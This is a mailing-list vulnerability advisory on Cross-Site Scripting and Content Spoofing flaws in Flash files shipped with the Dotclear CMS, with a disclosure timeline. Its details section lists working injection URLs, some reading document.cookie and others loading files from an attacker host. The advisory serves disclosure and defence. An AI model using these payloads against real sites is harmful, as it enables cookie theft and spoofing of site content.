Hello list! These are Cross-Site Scripting and Content Spoofing vulnerabilities in Dotclear. CMS Dotclear has three vulnerable flash-files: swfupload.swf, player_flv.swf and player_mp3.swf. File swfupload.swf it's Swfupload. I've wrote about vulnerabilities in Swfupload in November 2012 (http://securityvulns.ru/docs28759.html). SecurityVulns ID: 12719 CVE: CVE-2012-3414 File player_flv.swf it's FLV Player. I've wrote about vulnerabilities in FLV Player in August 2011 (http://securityvulns.ru/docs26894.html). SecurityVulns ID: 11877 File player_mp3.swf it's mp3 player similar to FLV Player (made by the same developer). ------------------------- Affected products: ------------------------- Vulnerable are Dotclear 2.4.4 (and partly 2.5) and previous versions. In version Dotclear 2.5 the developers fixed vulnerabilities but not effectively: 1) all three vulnerable flash-files are exist in engine (so no need to take them from repository or from web sites for using in own projects, since these are vulnerable versions of flashes); 2) the developers changed swfupload.swf in Dotclear 2.5 on previous version, but this one is still vulnerable to all XSS and CS holes; 3) for of direct access to flash-files (via .htaccess), to prevent using of their vulnerabilities, works only in Apache, but not in other web servers (so web sites on them are vulnerable). ---------- Details: ---------- Cross-Site Scripting (WASC-08): http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// Cross-Site Scripting (WASC-08): http://site/inc/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E http://site/inc/swf/player_flv.swf?onclick=javascript:alert(document.cookie) http://site/inc/swf/player_flv.swf?configxml=http://site/attacker.xml File xss.xml: http://site/inc/swf/player_flv.swf?config=http://site/attacker.txt File xss.txt: onclick=javascript:alert(document.cookie) ondoubleclick=javascript:alert(document.cookie) Code will execute after click. It's strictly social XSS. Content Spoofing (WASC-12): http://site/inc/swf/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E It's possible to inject text, images and html (e.g. for link injection). http://site/inc/swf/player_flv.swf?configxml=http://attacker/1.xml http://site/inc/swf/player_flv.swf?config=http://attacker/1.txt http://site/inc/swf/player_flv.swf?flv=http://attacker/1.flv http://site/inc/swf/player_mp3.swf?configxml=http://attacker/1.xml http://site/inc/swf/player_mp3.swf?config=http://attacker/1.txt http://site/inc/swf/player_mp3.swf?mp3=http://attacker/1.mp3 ------------ Timeline: ------------ 2013.01.10 - announced at my site. 2013.01.14 - informed developers about vulnerabilities in all three flashes. 2013.03.16 - released Dotclear 2.5. 2013.04.10-12 - wrote 4 additional letters to developers with reminding, with drawing attention on ineffective fixing of the holes and with persuading them to fix the holes correctly. 2013.04.12 - disclosed at my site (http://websecurity.com.ua/6255/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua